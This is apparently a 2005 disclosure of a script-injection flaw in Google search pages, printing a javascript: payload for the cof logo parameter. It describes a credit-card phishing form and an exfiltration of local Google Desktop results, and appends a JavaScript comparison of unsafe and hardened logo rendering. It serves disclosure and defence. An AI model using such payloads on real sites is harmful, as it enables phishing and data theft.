Google Base Exploit

Simple Google Cross Site Scripting Exploit.
15th November 2005
Jim Ley

The Problem

For over two years Google has had a script injection flaw. I reported it two years ago, and again a couple of months ago, but it still has not been fixed. Google Desktop has made the situation worse: Google search results now include the content of local files, so a script running in the Google page can read them too. With this in mind I produced a couple of simple example exploits.

Credit Card Phishing example

You can replace the content of the Google page with your own content; here I replaced it with a simple credit card submission form suggesting that Google will shortly become a subscription service. Screenshot of it in use.

The desktop sniffer example

Visit Google with this link, and the inserted Google Desktop search for password will be reported to my site.

The exploit might be easier to do with a custom form:


The exploit is simple: include a cof search parameter with the value

L:javascript:javascript:document.appendChild(document.createElement('script')).src=''

and the page will load the script from my domain. The problem is that Google fails to check that the image URL you supply to customise the look of the page (the L: logo option) is actually an image, and not a script. This is a well known problem for web authors; there was a CERT advisory back in 2000 (CA-2000-02) along with tips on how to mitigate it, which Google's developers seem to have missed.

That script can obviously do anything the Google page itself has permission for. In the desktop sniffer case it creates a hidden IFRAME containing a regular Google search for password (or whatever search term you used), and returns part of the resulting page to a page on my site which stores the data. In the phishing case it replaces the page with a form requesting a credit card number to buy access to Google, with all the details forwarded to my site.
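To make the flaw concrete, here is an added example (my own illustration, not Jim Ley's exploit code or anything from Google) of the vulnerable pattern beside a hardened one in JavaScript. It assumes the cof value is a semicolon-separated list of key:value options with L: carrying the logo URL, and it treats the http/https allowlist and the hypothetical renderLogoUnsafe/renderLogoSafe function names as my own choices:

```javascript
// Added example, not from the original page. Models a page that drops the
// attacker-controlled "L:" logo URL from the cof= parameter into
// <img src="..."> unchecked, beside a version that validates the scheme
// and escapes the output. The cof format assumed here (semicolon-separated
// key:value pairs, "L:" = logo URL) is an assumption about the format.

// Parse "L:http://x/y.gif;LH:50" into { L: "http://x/y.gif", LH: "50" }.
// Only the first colon separates key from value, so colons inside the URL
// (and inside a javascript: payload) stay in the value.
function parseCof(cof) {
  const opts = {};
  for (const pair of cof.split(';')) {
    const i = pair.indexOf(':');
    if (i <= 0) continue;                 // skip empty or keyless fragments
    opts[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return opts;
}

// Vulnerable: plain concatenation, no scheme check, no escaping. Any value
// the attacker puts after "L:" lands verbatim in the src attribute.
function renderLogoUnsafe(cof) {
  const { L } = parseCof(cof);
  return L ? `<img src="${L}">` : '';
}

// HTML-escape a value for use inside a double-quoted attribute.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Hardened: parse as an absolute URL, accept only http/https, then escape.
// Returns '' (no logo at all) for anything that is not a fetchable image URL.
function renderLogoSafe(cof) {
  const { L } = parseCof(cof);
  if (!L) return '';
  let url;
  try {
    url = new URL(L);                     // rejects relative and garbage values
  } catch {
    return '';
  }
  // The URL parser lower-cases the scheme, so "JAVASCRIPT:" is caught too.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '';
  return `<img src="${escapeAttr(url.href)}">`;
}

// Constructed inputs: the payload from the text (script URL elided as in the
// original), a benign logo, and an attribute break-out attempt.
const PAYLOAD =
  "L:javascript:javascript:document.appendChild(document.createElement('script')).src=''";
const BENIGN = 'L:http://example.com/logo.gif;LH:50';
const BREAKOUT = 'L:http://example.com/a.gif" onerror="alert(1)';

for (const cof of [PAYLOAD, BENIGN, BREAKOUT]) {
  console.log('unsafe:', renderLogoUnsafe(cof));
  console.log('safe:  ', renderLogoSafe(cof) || '(logo rejected)');
}
```

The unsafe renderer emits the javascript: URL straight into the src attribute; browsers of the period (notably Internet Explorer) would run such a URL as script in the page's own origin, which is exactly what the author's payload relies on. The hardened version does not try to prove the referenced resource is an image (it cannot, without fetching it); it settles for the two checks the 2000-era advice already called for: only accept URL schemes that can denote a fetchable resource, and escape whatever survives before it reaches markup.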

Screenshot of the phishing exploit

Screenshot of Google showing inserted credit card form